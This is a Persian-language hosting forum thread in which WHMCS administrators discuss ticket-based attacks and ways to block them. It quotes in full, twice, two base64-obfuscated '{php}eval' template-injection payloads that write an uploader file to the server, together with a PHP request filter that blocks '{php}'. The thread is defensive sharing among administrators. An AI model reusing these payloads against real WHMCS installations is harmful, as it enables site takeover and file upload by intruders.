با عرض سلام و احترام

دوستان وقتی هکر یک تیکت که حاوی کد رو ارسال می کنه ؟ یعنی اینکه به محتویات پوشه attach... دسترسی پیدا کرده ؟

اگه مسائل امنیتیرو انجام داده باشید نه
این تیکت یه آپلودر میسازه تو پوشه دانلود

---------- Post added at 11:38 PM ---------- Previous post was at 11:37 PM ----------

http://www.webhostingtalk.ir/f178/36259/#post334440

دوست عزیز

طرف از صبح 10 تا تیکت که حاوری فایل رو تیکت میده !

تمامی کارهایی که رو که در تاپیکی که گذاشتین انجام دادیم !

راه کار کلی برای خلاص شدن از شر این چیه ؟

ip و اکانت رو مسدود کنید
اون عبارت php رو به عنوان اسپم به سیستم معرفی کنید

و کار آخر هم اینه که برید قسمت Spam Control درون مدیریت whmcs و تو قسمت سابپکت دو کد هک
کد PHP:
{php}eval(base64_decode(' JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRz hnSnp4bWIzSnRJR0ZqZEdsdmJqMGlJaUJ0WlhSb2IyUTlJbkJ2 YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TF dSaGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhC c2IyRmtaWElpUGljN0RRcGxZMmh2SUNjOGFXNXdkWFFnZEhsd1 pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5U QWlQanhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSn pkV0p0YVhRaUlHbGtQU0pmZFhCc0lpQjJZV3gxWlQwaVZYQnNi MkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMT kxY0d3blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhB WTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hsSjExYkozUnRjRjl1WV cxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNk ZEtTa2dleUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVE lDRWhJVHd2WWo0OFluSStQR0p5UGljN0lIME5DZ2xsYkhObElI c2daV05vYnlBblBHSStWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3 ZZajQ4WW5JK1BHSnlQaWM3SUgwTkNuME5DajgrIik7DQokZm8g PSBmb3Blbigia2lyLnBocCIsInciKTsNCmZ3cml0ZSgkZm8sJG NvZGUpOw=='));{/php}


کد PHP:
{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb 2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJ q MGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMT FiSFJwY0dGeWRDOW1iM0p0TFdS aGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2 IyRmtaWElpUGljN0RRcGxZMmh2 SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm 1sc1pTSWdjMmw2WlQwaU5UQWlQ anhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0 p0YVhRaUlHbGtQU0pmZFhCc0lp QjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG 1LQ0FrWDFCUFUxUmJKMTkxY0d3 blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2 VTZ2tYMFpKVEVWVFd5ZG1hV3hs SjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYk dVblhWc25ibUZ0WlNkZEtTa2dl eUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVElDRWhJVH d2WWo0OFluSStQR0p5UGljN0lI ME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzYjJGa0lFZE JSMEZNSUNFaElUd3ZZajQ4WW5J K1BHSnlQaWM3SUgwTkNuME5DajgrIik7CiRmbyA9IGZvcGVuKC Jkb3dubG9hZHMvYjB4LnBocCIs InciKTsKZndyaXRlKCRmbywkY29kZSk7='));{/php}


را بلوک کنید

میبینی نخوندی

با بلوک کردن این کدها الان به شما تیکت نمیاد ؟

و کار آخر هم اینه که برید قسمت Spam Control درون مدیریت whmcs و تو قسمت سابپکت دو کد هک
کد PHP:
{php}eval(base64_decode(' JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRz hnSnp4bWIzSnRJR0ZqZEdsdmJqMGlJaUJ0WlhSb2IyUTlJbkJ2 YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TF dSaGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhC c2IyRmtaWElpUGljN0RRcGxZMmh2SUNjOGFXNXdkWFFnZEhsd1 pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5U QWlQanhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSn pkV0p0YVhRaUlHbGtQU0pmZFhCc0lpQjJZV3gxWlQwaVZYQnNi MkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMT kxY0d3blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhB WTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hsSjExYkozUnRjRjl1WV cxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNk ZEtTa2dleUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVE lDRWhJVHd2WWo0OFluSStQR0p5UGljN0lIME5DZ2xsYkhObElI c2daV05vYnlBblBHSStWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3 ZZajQ4WW5JK1BHSnlQaWM3SUgwTkNuME5DajgrIik7DQokZm8g PSBmb3Blbigia2lyLnBocCIsInciKTsNCmZ3cml0ZSgkZm8sJG NvZGUpOw=='));{/php}


کد PHP:
{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb 2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJ q MGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMT FiSFJwY0dGeWRDOW1iM0p0TFdS aGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2 IyRmtaWElpUGljN0RRcGxZMmh2 SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm 1sc1pTSWdjMmw2WlQwaU5UQWlQ anhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0 p0YVhRaUlHbGtQU0pmZFhCc0lp QjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG 1LQ0FrWDFCUFUxUmJKMTkxY0d3 blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2 VTZ2tYMFpKVEVWVFd5ZG1hV3hs SjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYk dVblhWc25ibUZ0WlNkZEtTa2dl eUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVElDRWhJVH d2WWo0OFluSStQR0p5UGljN0lI ME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzYjJGa0lFZE JSMEZNSUNFaElUd3ZZajQ4WW5J K1BHSnlQaWM3SUgwTkNuME5DajgrIik7CiRmbyA9IGZvcGVuKC Jkb3dubG9hZHMvYjB4LnBocCIs InciKTsKZndyaXRlKCRmbywkY29kZSk7='));{/php}


را بلوک کنید

میبینی نخوندی
من فرمایش که شما فرمودید رو انجام دادم ولی وقتی add new spam control میزنم این میاد
access denied

بلوك يا اسپام كردن فايده اي نداره بازم مياد
ما از بس اين هك ها دريافت كرديم خسته شديم و با يك كم وقت و هزينه يك فايروال نوشتيم براش و حالا بد جوري حال هكر را ميگيره و ديگه از اين تيكت هاي مزاحم خلاص شديم كمش روزي 50 تا بود كه الان به 0 رسيده و بلافاصله هكر كه معمولا با وي بي انـ كانكت مي شدند بن مي كنه:113:

والا ما که بلاک می کنیم کد ها رو ولی باز میان.
شما که نوشتین فایروال هزینه داره بگو ما هم بدیم .


بهتره عمومی کنی و با هزینه بفروشی و خیلیها طالب خواهند شد.

والا ما که بلاک می کنیم کد ها رو ولی باز میان.
شما که نوشتین فایروال هزینه داره بگو ما هم بدیم .
بهتره عمومی کنی و با هزینه بفروشی و خیلیها طالب خواهند شد.
با سلام و عرض ادب
با انجام سه یا چهار کار ساده به صورت کامل دسترسی رو بگیرید و هرگز هم از این تیکت ها خبری نخواهد بود
1..انتفال پوشه های تمپلیت_سی و اتیمچ و دانلود به هوم دایرکتوری
2..تغییر نام پوشه ادمین
3..قرار دادن کد جاوگیری از ارسال php در فایل .htacess
قبلا تو انجمن ذکر شده
در صورت تمایل با دریافت هزینه براتون انجام میدم
یا حق

ممنون دوست من تمام کارها صورت گرفته و رویه پوشه نیز کلمه عبور قرار دادیم.

این کدها چیه میشه بدین تا ما هم قرار بدیم چون پیدا نکردم تو انجمن

بله فرمايشات شما درست
1-اما بدونيد با تغيير اين پوشه ها كه بايد هم حتما تغييرشون بديد از اين اسپام ها خلاص نمي شين

2-با تغيير نام پوشه ادمين هم كاري به جايي نبردين كه معمولا اسپام و هك از خود كلينت شروع ميشه و اگر كسي به پنل ادمين بياد و يوزر پس الكي بزنه با ايميل خبرتون ميكنه كه فلان آي پي اومده تو بخش ادمين و...
پنل ادمينم ميشه با يك رنج آي پي مديريتش كرد كه فقط رنجهاي شما بتونند واردش بشن كه فايروال هم اين كار را مي كنه

3-در مورد جلوگيري از php هم اين كار راه خوبيه اما براي جلوگيري از قسمت هاي پاياني هك نه حذف اسپام هاي بعد از امن سازي

در مورد نظر دوستمون it-net هم بررسيش مي كنم چون من بيشتر دوست دارم اختصاصي كار كنم تا عمومي

يك سري كد جهت امن سازي اين اسپام ها است كه مي تونه كمي كمك كنه

برای خلاص شدن دائمی از شر این کدها و جلوگیری از هک شدن بجز تغییر پوشه ها و... کافیه کد زیر رو تو فایل configuration.php بنویسید


foreach ($_REQUEST as $value)
{
$pattern = strtolower($value);
$pattern = preg_replace('/\s+/', '', $pattern);
if(strpos($pattern, "{php}") !== false)
die("access denied");
}

دقیقا این کد رو بین تگ اول <?php
و متغییر $license قرار بدید
بعد هم میتونید نتیجه رو چک کنید
یا حق

برای خلاص شدن دائمی از شر این کدها و جلوگیری از هک شدن بجز تغییر پوشه ها و... کافیه کد زیر رو تو فایل configuration.php بنویسید


foreach ($_REQUEST as $value)
{
$pattern = strtolower($value);
$pattern = preg_replace('/\s+/', '', $pattern);
if(strpos($pattern, "{php}") !== false)
die("access denied");
}

دقیقا این کد رو بین تگ اول <?php
و متغییر $license قرار بدید
بعد هم میتونید نتیجه رو چک کنید
یا حق

ممنون دوست من انجام دادم چک کنم ببینم نتیجه چیه به همه اعلام می کنم